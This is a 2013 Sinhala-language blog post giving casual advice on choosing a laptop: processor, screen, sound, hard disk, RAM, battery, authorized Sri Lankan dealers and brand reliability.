ඔයාල හිතයි දැන් අපි උඩ මේක ගැන කතා කල නේද කියල . නැහැ මෙතන කියන්න ඊට වඩා වෙනස් දෙයක් ගැනයි. මේක ඔයාලට වියදම් කරන්න පුළුවන් මිල අනුව වෙනස් වෙනවා කියල මම උඩ කිව්වනේ. ඒ නිසා ඔයාලට ඒ ගැන හිතල එකක් ගන්න අවස්ථාව තියෙනව. සාමාන්‍ය වැඩ වලට Core 2 Duo එකෙයි, Core i3 එකෙයි වෙනසක් තේරෙන්නේ නැති තරම්. එත් ඔය ගේම් ගහන වගේ වැඩ වලට එහෙම කැමති නම්ලැප් එකක් ගන්නේ Games Play කරන්නත් එක්ක නම් Core i3 හෝ ඊට ඉහල මාදිලියක් ගන්න. ඒක තමාහොඳ.කොහොම උනත් අතේ තියෙන ගානට හොදම එකක් ගන්න හිතනවට වඩා අපි මේක ගන්නේ මොන වගේ වැඩ වලටද කියලා ටිකක් හොයලා බලලා ගන්න එක තමා හොද.නැත්නම් බොරැවට 60000,70000ක් වියදම් කරලා ලැප් එකක් අර ගන්නේ කැම්පස් එකේ Assignment ටික කරන්නනම් එකෙන් වැඩක් නෑ යාලුවනේ... රැල යන අතට ගියොත් අපටත් වෙන්නෙ වෙරල ගාවටම ඇවිත් ආපහු යන්න තමා...

Display / Screen 

මෙයත් ඔයාලගේ අවශ්‍ය වැඩේ අනුව රදා පවතිනවා. මොකද ඔය හැම තැනම යන ලැප් එකත් ඒ තැන වලට රැගෙන යනවා නම් Screen Size පොඩි එකකට යනවනම් වඩාත් පහසුය. 14.1 Wide Screen වගේ ඉදන් 20` Size වෙනකම් සාමාන්‍ය ලැප් වල Screen Size ඒක තොර ගන්න පුළුවන්. ඔබ AutoCAD වැනි CAD වැනි මෘදුකාංග භාවිත කරනවා නම් ලොකු Screen Size එකකට යෑම ඉතාමත් පහසුය. තවද Films බැලීමට පුරුදු වී සිටින්නේ නම් ලොකු Screen Size එකක් භාවිත කිරීම නුවනට සුදුසුය. අපි හිතමු ! ෆිල්ම්ස් බලන්නත් ඕන එත් හැම තැනම අරගෙන යන්නත් ඕන. එහෙම නම් සාමාන්‍ය මට්ටමේ Screen Size එකක් ගන්න. ඒ කියන්නේ 15.4 / 15. 6 වගේ. එහෙම බැරි නම් ඔබට අඩු Screen Size එකක් තෝරාගෙන වෙනම පිටින් සවි කල හැකි Monitor එකක් ගැනීම කල හැකිය. එවිටඑම Monitor ඒක ඔබට ලැප්ටොප් පරිගණකයේ VGA Port එකට සම්බන්ද කලහැකිය. 

වර්තමානයේ ලැප්ටොප් වල භාවිත වන්නේ LED Screen එකක් වන අතර LCD Screen සමග සසද්දි එය බොහෝ සෙයින් හැම අතින්ම ඉදිරියෙන් සිටි. එම නිසා LED Screen එකකට යෑම වඩාත්ම සුදුසුය. ගුණාත්මක භව, battery සුරැකීම ඇති එය ඉදිරියෙන් සිටි. LCD තිර හා සසදද්දී LED තිර වල Brightness ඉතාමත් හොඳ තත්වයක පවතී.එම නිසා හැකි තරම් LED Screen එකක් ගැනීම නුවනට හුරුය.

Sound කොහොමද ? On-board  ? Separate  ?


දැන් ගොඩක් ලැප් වල එන්නේ Onboard Sound Card එකක්. ඒ කියන්නේ Realtek, IDT, VIA වගේ ඒවා තමා එන්නේ. ගොඩක් වෙලාවට 7.1 Sound Card එකක් එන්නේ කාලතුරකින්. ගොඩක් වෙලාවට 2.1 හා 4.1 වගේ තමා එන්නේ. ඉතින් දැන් ඔය Sound එහෙම හොයන අය ඉන්නවා නම් ඒ ගොල්ලන්ට වෙනම Separate Sound Card එකක් ගහ ගන්න පුළුවන්. සමන්නයෙන් ලංකාවේ නම් ඉතින් අඩුයි කොහොමත් ලැප් එකට ගොඩක් sound ඔනේ නෑ නේද මන්දා මටනම් ඔනේ නෑ ඒත් ඔයාලට කොහොමද දන් නෑනෙ...


Hard Disk 


ගොඩක් වැදගත් එකක් තමා මේ Hard Disk ඒක. එකේ Size ඒක වැඩි වෙන තරමටහොඳ......මොකද ඕන කුණු ගොඩක් දාන්න පුළුවන් නේ දැන් නම් ගොඩක් ලැප් වල 320 GB, 500 GB, 750 GB, 1TB වගේ එනවා. මේවල වැඩි එකක් තොරගන්න තරමට දාන්න පුළුවන් Data ප්‍රමාණය වැඩි.
මේවල 5400 RPM [ Round per Minute ] , 7200 RPM කියල එකක් තියෙනව. RPM ඒක කියන්නේ Hard Disk එකේ තියෙන තැටි විනාඩියකට කැරකෙවෙන ගාන. මේ කැරකෙවෙන ගාන වැඩි වෙන තරමට වේගය වැඩි. නමුත් Battery වල බලය සුරැකීම සඳහා ගොඩක් ලැප් වල 5400 RPM එකක් තමා එන්නේ. එහෙම කියල ලොකු අවුලක් නැහැ.

RAM

මේකත් ගොඩක් වැදගත් යාලුවනේ.මේක නම් වැඩි වෙන තරමට හොඳා.සාමාන්නයෙන් ලැප් එකක    

2 GB, 4 GB වගේ RAM එකක් තියෙන්නේ. කැමති නම් ඔයාට 8 GB හෝ 16 GBදක්වා මෙය වැඩි කරගන්න පුළුවන්. ඒ ප්‍රමාණය ඔයාගේ ලැප් ඒක අනුව වෙනස්වෙනවා. වර්තමානයේ ලැප් වල DDR 3 වර්ගයේ Memory Module භාවිත වේ.





Battery 

මේක තමා ලැප් එකක වැදගත්ම ඒක. Battery. මේක ආරක්ෂා කරගන්න ඒක තමා අපිට ඕනෑම ඒක. ඒක ඒක ලැප් වල මේවට ඒක ඒක තාක්ෂණ භාවිත කරනවා නිර්මාණය කරන්න. ඒ කියන්නේ Ni-MH හා Li-on වගේ විදියට. මේවල Battery Hours Li-oN වල වැඩි. සමන්නයෙන් 6 Cell / 8 Cell / 12 Cell විදියට මේවල ධාරිතා ප්‍රමාණයන්ගෙන් මේවා ගන්න පුළුවන්. ඔය ලැප් එකක් ගන්න කොට නම් එන්නේ සමන්නයෙන් 6 Cell එකක්. නමුත් අවශ්‍ය නම් අදාල ආයතනයට කියල 12 Cell එකක් ගන්න පුළුවන්. 6 Cell Battery එකකින් 4 Hours විතර LED Screen එකක් තියෙන ලැප් එකකින් භාවිත කරන්න පුළුවන්. 12 Cell නම් 8 Hours විතර පුළුවන්. දැනට වැඩිම battery ප්‍රමාණයක් තියෙන්නේ Apple ලැප් වල. එහි 10 Hours පමණ 8 Cell එකකින් භාවිත කරන්නට පුළුවන්.


දැන් අපි බලමු කොහෙන්ද හොඳ ලැප් එකක් ගන්න පුළුවන් කියල 

ලැප්ටොප් නිෂ්පාදනය කරන විශාල ආයතන ප්‍රමාණයක් ලෝකයේ ඇත. එම ලැප්ටොප් විකිණීම සිදු කිරීමට අදාල රටකට යම්කිසි බලයලත් අලෙවි නියෝජිතයෙක් අදාල ආයතනය විසින් පත් කර ඇත. එම අදාල ආයතනය එම වර්ගයේ ලැප්ටොප් පරිගණක වල සියලුම සේවා හෝ යම්තාක් දුරට සේවා සැපයීමට බැදී සිටි. ඔබ ලැප්ටොප් පරිගණකයක් ගන්නවානම් අදාල පරිගණකයට අදාල බලයලත් අලෙවි නියෝජිතයන් ගෙන් මිලදී ගන්නවනම් ඉතින් කිසිම අවුලක් නෑ.
මේ තියෙන්නේ ලංකාවේ දැනට භාවිතා වන ලැප්ටොප් විකිනීමට බලයලත් නියෝජිත ආයතන ටික (Authorized Dealers)


(සියලුම companies වල Official Web Page එකේ ලින්ක් එක එක්ක තියෙන්නෙ)

හැබැයි දැන්නම් SOFT LOGIC අය මේ සේරම කරනව මම දන්න විදිහට.


ඊලගට ඔයාලට ගැටලුවක් ඇති නේද මොනවද හොද brand කියලා Acer, Apple, Asus, Dell, Lenovo, Compaq වගේ Brand නම් ආබාධයක් නැත. නමුත් HP වැනි Brand ඒ‍කේ‍ පොඩි පොඩි battery අවුල් එනව වගේම තමා මටත් ගොඩක් ඇවිල්ල තියනව keyboard අවුල්  HP Pavilion Series වලින් බොහෝ සෙයින් බැටරි අවුල් ආව claim වලට...
කොහොම හරි කමක් නෑ ලැප් එකක් ගද්දි ටිකක් හොයලා බලලා දන්න කෙනෙක් එක්ක ගියොත් කිසි ආබාධයක් නෑ....
Copyright © 2013 ...:::SDJ:::...